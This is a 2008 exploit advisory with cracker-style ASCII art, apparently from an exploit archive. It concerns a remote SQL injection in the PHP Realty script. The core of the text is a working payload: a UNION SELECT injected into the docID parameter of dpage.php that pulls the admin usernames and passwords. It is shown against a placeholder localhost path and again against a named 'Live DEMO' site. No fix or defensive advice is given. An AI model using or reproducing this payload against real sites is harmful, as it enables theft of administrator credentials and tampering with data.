PHP Realty suffers from a remote SQL injection vulnerability.
5b06a83e1817fda29075ca654c085f1dc6f84e1a8896bea1432262065bd54800
┌┌─────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└─────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Remote SQL Injection ] ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr : : :
│ Group : N/A │ │ │
│ Script : PHP Realty │ │ Register Globals : │
│ Download : ypninc.com │ │ │
│ Method : GET │ │ [█] ON [ ] OFF │
│ Critical : High [░░▒▒▓▓██] │ │ │
│ Impact : Manipulation of data │ │ │
│ ───────────────────────────────────────┘ └────────────────────────────────────── │
│ DALnet #crackers ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘ Exploit URL's ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
[SQL]
http://www.localhost.com/path/dpage.php?docID=-1 UNION SELECT 1,2,concat(Username,0x3a,Password) FROM admin--
Live DEMO:
http://phprealty.ypninc.com/dpage.php?docID=-1 UNION SELECT 1,2,concat(Username,0x3a,Password) FROM admin--
└──────────────────────────────────────────────────────────────────────────────────┘
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .
┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2008 ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘